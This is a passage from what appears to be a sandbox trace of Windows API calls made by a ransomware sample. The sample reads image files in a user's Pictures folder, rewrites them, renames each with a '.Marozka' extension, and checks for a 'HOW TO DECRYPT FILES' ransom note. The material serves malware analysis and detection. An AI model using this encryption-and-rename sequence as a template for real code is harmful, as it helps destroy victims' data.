ftLastAccessTime.dwHighDateTime=0x1d4d18d, ftLastWriteTime.dwLowDateTime=0xe3ce38b2, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xb590)) returned 1 [0055.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.496] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gyiwdlbs0sdwevs3.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\GYIWDLBS0sDwEVs3.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\gyiwdlbs0sdwevs3.png.marozka")) returned 1 [0055.497] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", lpFilePart=0x0) returned 0x2e [0055.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ifjllssrt5dx19jp3.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.497] GetFileType (hFile=0x2e0) returned 0x1 [0055.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.497] GetFileType (hFile=0x2e0) returned 0x1 [0055.497] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x17975 [0055.497] ReadFile (in: hFile=0x2e0, lpBuffer=0x38d02f8, nNumberOfBytesToRead=0x17975, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x38d02f8*, lpNumberOfBytesRead=0x5beabc*=0x17975, lpOverlapped=0x0) returned 1 [0055.498] CloseHandle (hObject=0x2e0) returned 1 [0055.533] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.533] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", lpFilePart=0x0) returned 0x2e [0055.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ifjllssrt5dx19jp3.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.535] GetFileType (hFile=0x2e0) returned 0x1 [0055.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.535] GetFileType (hFile=0x2e0) returned 0x1 [0055.535] WriteFile (in: hFile=0x2e0, lpBuffer=0x38e7c90*, nNumberOfBytesToWrite=0x17980, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x38e7c90*, lpNumberOfBytesWritten=0x5beab0*=0x17980, lpOverlapped=0x0) returned 1 [0055.538] CloseHandle (hObject=0x2e0) returned 1 [0055.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp", lpFilePart=0x0) returned 0x2e [0055.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp.Marozka", lpFilePart=0x0) returned 0x36 [0055.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.541] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ifjllssrt5dx19jp3.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe15e9180, ftCreationTime.dwHighDateTime=0x1d4c6f7, ftLastAccessTime.dwLowDateTime=0x4dbce780, ftLastAccessTime.dwHighDateTime=0x1d4cc2c, ftLastWriteTime.dwLowDateTime=0xe3d55f10, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17980)) returned 1 [0055.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.541] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ifjllssrt5dx19jp3.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\iFjLLssRt5dx19jP3.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\ifjllssrt5dx19jp3.bmp.marozka")) returned 1 [0055.542] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", lpFilePart=0x0) returned 0x2c [0055.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jcwuhkulsa frjj.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.542] GetFileType (hFile=0x2e0) returned 0x1 [0055.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.542] GetFileType (hFile=0x2e0) returned 0x1 [0055.542] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x154f3 [0055.542] ReadFile (in: hFile=0x2e0, lpBuffer=0x38ff630, nNumberOfBytesToRead=0x154f3, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x38ff630*, lpNumberOfBytesRead=0x5beabc*=0x154f3, lpOverlapped=0x0) returned 1 [0055.543] CloseHandle (hObject=0x2e0) returned 1 [0055.745] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.745] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.746] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", lpFilePart=0x0) returned 0x2c [0055.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jcwuhkulsa frjj.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.747] GetFileType (hFile=0x2e0) returned 0x1 [0055.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.747] GetFileType (hFile=0x2e0) returned 0x1 [0055.747] WriteFile (in: hFile=0x2e0, lpBuffer=0x366c468*, nNumberOfBytesToWrite=0x15500, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x366c468*, lpNumberOfBytesWritten=0x5beab0*=0x15500, lpOverlapped=0x0) returned 1 [0055.749] CloseHandle (hObject=0x2e0) returned 1 [0055.751] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg", lpFilePart=0x0) returned 0x2c [0055.751] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg.Marozka", lpFilePart=0x0) returned 0x34 [0055.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.751] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jcwuhkulsa frjj.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6810f510, ftCreationTime.dwHighDateTime=0x1d4d3ff, ftLastAccessTime.dwLowDateTime=0x4a58f0a0, ftLastAccessTime.dwHighDateTime=0x1d4cecc, ftLastWriteTime.dwLowDateTime=0xe3f6c108, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15500)) returned 1 [0055.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.751] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\jcwuhkulsa frjj.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\jcwUhKuLSA FrJJ.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\jcwuhkulsa frjj.jpg.marozka")) returned 1 [0055.752] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", lpFilePart=0x0) returned 0x25 [0055.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.752] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ke4tsphl.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.752] GetFileType (hFile=0x2e0) returned 0x1 [0055.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.752] GetFileType (hFile=0x2e0) returned 0x1 [0055.752] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x3608 [0055.752] ReadFile (in: hFile=0x2e0, lpBuffer=0x267ac24, nNumberOfBytesToRead=0x3608, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x267ac24*, lpNumberOfBytesRead=0x5beabc*=0x3608, lpOverlapped=0x0) returned 1 [0055.752] CloseHandle (hObject=0x2e0) returned 1 [0055.768] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.768] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", lpFilePart=0x0) returned 0x25 [0055.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.768] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ke4tsphl.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.769] GetFileType (hFile=0x2e0) returned 0x1 [0055.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.769] GetFileType (hFile=0x2e0) returned 0x1 [0055.769] WriteFile (in: hFile=0x2e0, lpBuffer=0x26d885c*, nNumberOfBytesToWrite=0x3610, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26d885c*, lpNumberOfBytesWritten=0x5beab0*=0x3610, lpOverlapped=0x0) returned 1 [0055.770] CloseHandle (hObject=0x2e0) returned 1 [0055.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png", lpFilePart=0x0) returned 0x25 [0055.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png.Marozka", lpFilePart=0x0) returned 0x2d [0055.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.771] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ke4tsphl.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e937a0, ftCreationTime.dwHighDateTime=0x1d4c99b, ftLastAccessTime.dwLowDateTime=0x4e612e30, ftLastAccessTime.dwHighDateTime=0x1d4c844, ftLastWriteTime.dwLowDateTime=0xe3f9267c, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x3610)) returned 1 [0055.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.772] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png" (normalized: "c:\\users\\fd1hvy\\pictures\\ke4tsphl.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\kE4tsPhl.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\ke4tsphl.png.marozka")) returned 1 [0055.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", lpFilePart=0x0) returned 0x2d [0055.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kunkfs5a3_kxbu1u.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.772] GetFileType (hFile=0x2e0) returned 0x1 [0055.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.772] GetFileType (hFile=0x2e0) returned 0x1 [0055.772] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x541f [0055.772] ReadFile (in: hFile=0x2e0, lpBuffer=0x26dc308, nNumberOfBytesToRead=0x541f, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26dc308*, lpNumberOfBytesRead=0x5beabc*=0x541f, lpOverlapped=0x0) returned 1 [0055.773] CloseHandle (hObject=0x2e0) returned 1 [0055.803] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.803] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.804] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", lpFilePart=0x0) returned 0x2d [0055.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kunkfs5a3_kxbu1u.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.805] GetFileType (hFile=0x2e0) returned 0x1 [0055.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.805] GetFileType (hFile=0x2e0) returned 0x1 [0055.805] WriteFile (in: hFile=0x2e0, lpBuffer=0x2743594*, nNumberOfBytesToWrite=0x5420, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2743594*, lpNumberOfBytesWritten=0x5beab0*=0x5420, lpOverlapped=0x0) returned 1 [0055.806] CloseHandle (hObject=0x2e0) returned 1 [0055.809] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg", lpFilePart=0x0) returned 0x2d [0055.809] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg.Marozka", lpFilePart=0x0) returned 0x35 [0055.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.809] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kunkfs5a3_kxbu1u.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5aeac700, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xb2fc3090, ftLastAccessTime.dwHighDateTime=0x1d4d557, ftLastWriteTime.dwLowDateTime=0xe3fde76b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5420)) returned 1 [0055.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.809] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kunkfs5a3_kxbu1u.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\kUnKFS5a3_kxbu1U.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\kunkfs5a3_kxbu1u.jpg.marozka")) returned 1 [0055.810] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", lpFilePart=0x0) returned 0x22 [0055.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mvxop.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.810] GetFileType (hFile=0x2e0) returned 0x1 [0055.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.810] GetFileType (hFile=0x2e0) returned 0x1 [0055.810] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x9cdb [0055.810] ReadFile (in: hFile=0x2e0, lpBuffer=0x2748e74, nNumberOfBytesToRead=0x9cdb, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2748e74*, lpNumberOfBytesRead=0x5beabc*=0x9cdb, lpOverlapped=0x0) returned 1 [0055.810] CloseHandle (hObject=0x2e0) returned 1 [0055.848] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.848] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.848] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", lpFilePart=0x0) returned 0x22 [0055.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.848] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mvxop.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.850] GetFileType (hFile=0x2e0) returned 0x1 [0055.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.850] GetFileType (hFile=0x2e0) returned 0x1 [0055.850] WriteFile (in: hFile=0x2e0, lpBuffer=0x27c6cc0*, nNumberOfBytesToWrite=0x9ce0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27c6cc0*, lpNumberOfBytesWritten=0x5beab0*=0x9ce0, lpOverlapped=0x0) returned 1 [0055.851] CloseHandle (hObject=0x2e0) returned 1 [0055.852] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp", lpFilePart=0x0) returned 0x22 [0055.852] 